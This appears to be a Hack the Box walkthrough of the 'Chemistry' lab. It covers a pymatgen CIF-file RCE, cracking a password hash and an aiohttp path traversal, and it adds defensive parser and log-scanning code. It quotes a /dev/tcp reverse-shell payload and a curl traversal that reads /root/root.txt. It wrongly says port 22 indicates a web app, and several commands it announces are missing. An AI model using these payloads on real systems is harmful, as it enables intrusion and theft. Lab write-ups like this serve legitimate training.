Welcome to another Hack the Box exercise. In this walkthrough, I have documented how I pwned the Chemistry machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs.
About the Machine
Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the pymatgen Python library (CVE-2024-23346), triggered by uploading a malicious `CIF` file to the CIF Analyzer website hosted on the target. After discovering and cracking password hashes, we authenticate to the target via SSH as the rosa user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in the AioHTTP Python library (CVE-2024-23334), used by a web application running internally, to read the root flag.
As in my previous posts, the first step in solving a machine is connecting the Kali Linux terminal to the Hack the Box server: log into your HTB account, navigate to "Machines" and select the machine you want to pwn. In this case, I selected "Chemistry", downloaded the lab access file and renamed it to chemistry.ovpn.
I like doing this because it lets me keep track of all the files I download on my Linux system, and for simplicity (keeping the name as short as possible). After the file was downloaded, I created a directory "ChemistryHTB" on my desktop and moved the file into it. Then I opened a new terminal and ran the following command to connect my terminal to the HTB server:
The sudo openvpn chemistry.ovpn command connects my Kali Linux terminal to the Hack the Box server. Once the connection was established, I ran an Nmap scan to find the open ports on the target machine. This step is crucial for learning what the machine is about and what to do next.
I right-clicked on the terminal and chose “split terminal vertically” to open a new terminal. Then, I typed the following command to find the open ports on the target machine IP address:
The nmap scan revealed two open ports: port 22/tcp (which indicates the target machine is a web app) and port 5000/tcp (the default port for web servers running Python-based web applications; it is also used by some network backup software and for running decentralized applications on the Ethereum blockchain network).
After the nmap enumeration completed, I added the target IP address to the /etc/hosts file by running the following command:
To exit the editor, press Ctrl + X, then Y and Enter to save and exit. Next, I opened Firefox and visited 10.10.11.38 or chemistry.htb, and got the following output:
The page responded at 10.10.11.38:5000 (with the port appended). The website interface presented two buttons, one to log in and another to register. So I registered an account with a username and password, then logged in with the same credentials.
On the dashboard, the system provided a button to upload a file and also a button to submit it.
The only acceptable file type is .cif. I had no idea what this meant, so I searched Google and found that CIF stands for Crystallographic Information File, a standard text file format for representing crystallographic information, promulgated by the International Union of Crystallography (IUCr).
For every file upload, the first thing that crosses my mind is a reverse shell. I searched for common vulnerabilities associated with CIF and found a few, such as CVE-2023-48031 and CVE-2024-23346. CVE-2024-23346 stood out, so I dug deeper into it.
Summary of the CVE
CVE-2024-23346 is a critical security vulnerability in the JonesFaithfulTransformation.from_transformation_str() method of the pymatgen library. The method insecurely uses eval() to process its input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited by parsing a maliciously crafted CIF file.
The cause of the vulnerability is in pymatgen/symmetry/settings.py#L97C1-L111C108: the flawed code segment performs a regular expression operation followed by a call to eval().
Vulnerable code
Using eval, even with __builtins__ set to None, remains a security risk: the BuiltinImporter class can be recovered through subclass traversal.
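To show why the eval()-based parsing described above is unsafe and what a hardened replacement looks like, here is an added example (my own code, not pymatgen's, and not the code from the advisory). It assumes the transformation strings have the Jones-Faithful shape pymatgen documents, such as "-x+y,2y,z+1/2;0,1/2,0", and the function names parse_component, parse_transformation, is_valid_transformation and unsafe_eval_component are hypothetical. The safe parser only accepts rational coefficients of x, y and z plus constants; anything outside that grammar, including attribute access or calls, is rejected instead of being evaluated. The unsafe helper reproduces the eval-with-__builtins__-None pattern only far enough to show that attribute access still works there, which is the foothold the advisory refers to.

```python
import re
from fractions import Fraction

# Hypothetical helper names for this example; they are not pymatgen's API.

# One term of a Jones-Faithful component: optional sign, then either a
# rational coefficient with an optional variable ("2*y", "1/2", "3x") or a
# bare variable ("x", "-z"). The alternation is mandatory, so TERM never
# matches an empty string.
TERM = re.compile(r"\s*([+-])?\s*(?:(\d+(?:/\d+)?)\s*\*?\s*([xyz])?|([xyz]))\s*")


def parse_component(expr):
    """Parse e.g. '-x+y+1/2' into ([cx, cy, cz], constant) as Fractions.

    The whole string must be consumed by the TERM grammar; anything else
    (attribute access, calls, brackets, names other than x/y/z) raises.
    """
    if not expr.strip():
        raise ValueError("empty component")
    coeffs = {"x": Fraction(0), "y": Fraction(0), "z": Fraction(0)}
    const = Fraction(0)
    pos, first = 0, True
    while pos < len(expr):
        m = TERM.match(expr, pos)
        if m is None:
            raise ValueError(f"invalid term at offset {pos}: {expr[pos:]!r}")
        sign, num, var_with_num, bare_var = m.groups()
        if not first and sign is None:
            raise ValueError(f"missing operator before offset {pos}")
        value = Fraction(num) if num else Fraction(1)
        if sign == "-":
            value = -value
        var = var_with_num or bare_var
        if var:
            coeffs[var] += value
        else:
            const += value
        pos, first = m.end(), False
    return [coeffs["x"], coeffs["y"], coeffs["z"]], const


def parse_transformation(s):
    """Parse 'a,b,c' or 'a,b,c;p1,p2,p3' into (3x3 matrix P, translation p).

    Convention assumed here: constants found inside the first part and the
    optional second part are summed into the translation vector p.
    """
    parts = s.split(";")
    if len(parts) not in (1, 2):
        raise ValueError("expected at most one ';'")
    comps = parts[0].split(",")
    if len(comps) != 3:
        raise ValueError("expected three comma-separated components")
    P, p = [], []
    for comp in comps:
        row, const = parse_component(comp)
        P.append(row)
        p.append(const)
    if len(parts) == 2:
        shifts = parts[1].split(",")
        if len(shifts) != 3:
            raise ValueError("expected three translation components")
        for i, shift in enumerate(shifts):
            row, const = parse_component(shift)
            if any(row):
                raise ValueError("translation part must be constant")
            p[i] += const
    return P, p


def is_valid_transformation(s):
    """True when the string is accepted by the restricted grammar."""
    try:
        parse_transformation(s)
        return True
    except ValueError:
        return False


def unsafe_eval_component(expr):
    """The risky pattern the advisory describes: eval() with __builtins__
    disabled. Attribute access still works, so the input is not confined to
    the transformation grammar even though builtin names are unavailable."""
    return eval(expr, {"__builtins__": None, "x": 1.0, "y": 1.0, "z": 1.0})


if __name__ == "__main__":
    print(parse_transformation("-x+y,2*y,z+1/2;0,1/2,0"))
    print(is_valid_transformation("x.__class__,y,z"))
    print(unsafe_eval_component("x.__class__"))
```

The safe parser never executes the input; it only tokenizes it, so a string that is not a transformation fails closed with a ValueError that the CIF loader can surface as a parse error.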
Proof of Concept
The vulnerability can be exploited as follows:
Create a file vuln.cif with the following contents:
Then, parse the cif file with the following code:
Alternatively, you can use the complete CIF file that worked for me: create vuln.cif and paste the following content into it.
Make sure to check your machine's IP address by running ifconfig and change the system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'") line accordingly. After modifying the necessary part of the code, I uploaded the vuln.cif file and set up a netcat listener to catch the reverse shell.
After uploading the vuln.cif file, click on "View" to execute the payload and wait for the response from the netcat listener.
After a few seconds, I got a shell and decided to stabilize it by running:
I got a shell as app@chemistry and navigated around until I found the user.txt file. I tried to read it by running:
But permission was denied: I did not have enough privileges to read the file. One thing that caught my eye while navigating around was the home directory: I found a user rosa in /home and knew I needed to get a shell as that user. I searched everywhere and luckily found a database.db file in the static/template/instance directory.
To read the contents of the database file, I ran the following command and found a hash starting with Mrosa:
I copied the hash and attempted to crack it by visiting https://crackstation.net. The cracked value was unicorniosrosados. I copied it and attempted to use the password to authenticate as rosa over SSH.
I ran the following command and, just like magic, it worked: I obtained a rosa@chemistry shell using the password unicorniosrosados:
After gaining the rosa@chemistry shell, I listed all the files in the home directory and found three files, including user.txt, which I opened by running:
Hurray!!! I found the user flag.
The next step was to obtain the root flag. First, I checked the list of active listening network connections along with their associated processes by running the following command:
I noticed something interesting listening on localhost:8080 and decided to dig deeper. I set up a local port forwarding tunnel via SSH by running the following command in the terminal:
This connects to the remote machine at 10.10.11.38 as user rosa and forwards local port 7000 to 127.0.0.1:8080 on the remote machine.
Afterwards, I sent an HTTP HEAD request to localhost on port 8080 by running the following command:
This is useful for quickly checking whether a server is up and what headers it returns (status code, content type, etc.). Then I exploited the path traversal vulnerability, which occurs when a server improperly handles file paths and allows an attacker to access files outside the intended directory, by running the following command:
Breakdown:
- curl -s: Runs curl silently.
- --path-as-is: Tells curl not to normalize the URL path.
- http://localhost:8080/assets/../../../../root/root.txt: The URL attempts to go up four directories (../../../../) and access /root/root.txt.
Hurray!!! I got the root flag.
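For the defender's side of the traversal shown in the breakdown above, here is an added example (my own code, not aiohttp's and not the page's). It models a static-file route that receives the part of the URL after the /assets prefix: vulnerable_resolve joins it onto the static root with no containment check, so "../../../../root/root.txt" normalizes to /root/root.txt, while hardened_resolve decodes, normalizes and then refuses any result that is not under the root. A third function, flag_traversal_requests, scans access-log lines for ".." segments so that attempts like the curl --path-as-is request can be spotted whether or not they succeeded. The function names, the root directory /srv/app/assets and the log lines are all constructed for this example.

```python
import os
import re
from urllib.parse import unquote

# Hypothetical helper names and constructed data; not aiohttp's code.


def vulnerable_resolve(root, remainder):
    """Join the route remainder onto the static root without checking that
    the result still lies under root. '..' segments walk out of it, and an
    absolute remainder makes os.path.join discard root entirely."""
    return os.path.normpath(os.path.join(root, remainder))


def hardened_resolve(root, remainder):
    """Decode, join, normalise, then require the result to stay under root.
    Returns the absolute path, or None when the request would escape."""
    root = os.path.abspath(root)
    decoded = unquote(remainder)  # catch %2e%2e-style encodings too
    candidate = os.path.normpath(os.path.join(root, decoded))
    # commonpath equals root only when candidate is root or below it
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Request line inside a common-log-format entry: method, path, protocol.
LOG_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def flag_traversal_requests(log_lines):
    """Return (line_number, decoded_path) for every request whose decoded
    path contains a '..' segment, regardless of the response status."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        path = unquote(m.group(1)).split("?", 1)[0]
        if ".." in path.split("/"):
            hits.append((n, path))
    return hits


# Constructed sample access-log lines (not taken from the target machine).
SAMPLE_LOG = [
    '127.0.0.1 - - [23/Oct/2024:10:00:01 +0000] "GET /assets/css/site.css HTTP/1.1" 200 512',
    '127.0.0.1 - - [23/Oct/2024:10:00:02 +0000] "HEAD / HTTP/1.1" 200 0',
    '127.0.0.1 - - [23/Oct/2024:10:00:03 +0000] "GET /assets/../../../../root/root.txt HTTP/1.1" 200 33',
    '127.0.0.1 - - [23/Oct/2024:10:00:04 +0000] "GET /assets/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
]


if __name__ == "__main__":
    root = "/srv/app/assets"  # constructed static root
    print(vulnerable_resolve(root, "../../../../root/root.txt"))
    print(hardened_resolve(root, "../../../../root/root.txt"))
    print(hardened_resolve(root, "css/site.css"))
    for line_no, path in flag_traversal_requests(SAMPLE_LOG):
        print(f"line {line_no}: traversal attempt {path}")
```

The containment check is done on the normalized path rather than by searching the raw string for "..", which is why the percent-encoded variant is handled the same way; the log scanner, by contrast, deliberately keys on the ".." segment itself because it is looking for attempts, not outcomes.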
Congratulations if you made it this far. If you enjoy reading my writeups, kindly subscribe to my channel and follow me on my social media handles:
YouTube channel: https://m.youtube.com/@BoltechTechnologies1
LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/
Twitter at https://x.com/BoltechNG
Follow me on Medium: https://medium.com/@boltech
This walkthrough was first published on Medium on October 23rd 2024. It had 6 views and 2 reads on Medium before it was suspended by Medium and Hack the Box for posting spoilers.